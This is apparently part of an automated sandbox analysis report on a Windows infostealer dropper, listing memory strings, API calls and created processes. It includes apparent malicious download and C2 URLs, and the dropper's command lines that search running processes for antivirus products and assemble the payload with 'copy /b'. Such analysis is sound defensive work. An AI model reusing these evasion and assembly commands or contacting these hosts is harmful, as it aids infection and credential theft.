                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmp, Luther.com.2.dr, Page.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: installer_1.05_37.4.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt#
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt?
                Source: Luther.com, 0000000D.00000002.4496055520.00000000009DA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/S
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/x
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txtoft
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497796930.0000000003A02000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.00000000038BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/
                Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/$40.
                Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/9
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/=
                Source: Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/H
                Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/S
                Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/api
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/api.0
                Source: Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/apijinh
                Source: Luther.com, 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/apijpjb
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/h.
                Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/i
                Source: Luther.com, 0000000D.00000002.4497214664.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou/l
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou:443/api
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goldyhanders.cyou:443/apiMicrosoft
                Source: Luther.com, 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Luther.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Luther.com, 0000000D.00000003.2246201990.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2246305731.00000000038E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Luther.com, 0000000D.00000003.2272933536.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49782 version: TLS 1.2
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00EAF7C7
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00EAF55C
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EC9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00EC9FD2
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E4FFE0 CloseHandle,NtProtectVirtualMemory,13_2_00E4FFE0
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,13_2_00EA4763
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E91B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00E91B4D
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,13_2_00E9F20D
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile created: C:\Windows\MonoQueryJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile created: C:\Windows\CorrespondenceSerbiaJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile created: C:\Windows\OverNodesJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_0040497C0_2_0040497C
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00406ED20_2_00406ED2
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004074BB0_2_004074BB
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E5801713_2_00E58017
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E3E1F013_2_00E3E1F0
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E4E14413_2_00E4E144
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E522A213_2_00E522A2
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E322AD13_2_00E322AD
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6A26E13_2_00E6A26E
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E4C62413_2_00E4C624
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EBC8A413_2_00EBC8A4
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6E87F13_2_00E6E87F
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E66ADE13_2_00E66ADE
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA2A0513_2_00EA2A05
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E98BFF13_2_00E98BFF
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E4CD7A13_2_00E4CD7A
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E5CE1013_2_00E5CE10
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6715913_2_00E67159
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E3924013_2_00E39240
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EC531113_2_00EC5311
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E396E013_2_00E396E0
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E5170413_2_00E51704
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E51A7613_2_00E51A76
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E57B8B13_2_00E57B8B
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E39B6013_2_00E39B60
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E57DBA13_2_00E57DBA
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E51D2013_2_00E51D20
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E51FE713_2_00E51FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\224553\Luther.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: String function: 00E50DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: String function: 00E4FD52 appears 40 times
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: String function: 004062A3 appears 58 times
                Source: installer_1.05_37.4.exeStatic PE information: invalid certificate
                Source: installer_1.05_37.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/22@3/2
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA41FA GetLastError,FormatMessageW,13_2_00EA41FA
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E92010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00E92010
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E91A0B AdjustTokenPrivileges,CloseHandle,13_2_00E91A0B
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,13_2_00E9DD87
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,13_2_00EA3A0E
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsx76B1.tmpJump to behavior
                Source: installer_1.05_37.4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Luther.com, 0000000D.00000003.2260009291.00000000038C9000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2260290711.0000000003A52000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247461387.00000000038BA000.00000004.00000800.00020000.00000000.sdmp, Luther.com, 0000000D.00000003.2247094175.0000000003A40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: installer_1.05_37.4.exeVirustotal: Detection: 13%
                Source: installer_1.05_37.4.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeFile read: C:\Users\user\Desktop\installer_1.05_37.4.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\installer_1.05_37.4.exe "C:\Users\user\Desktop\installer_1.05_37.4.exe"
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Choosing
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com z
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ChoosingJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.comJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
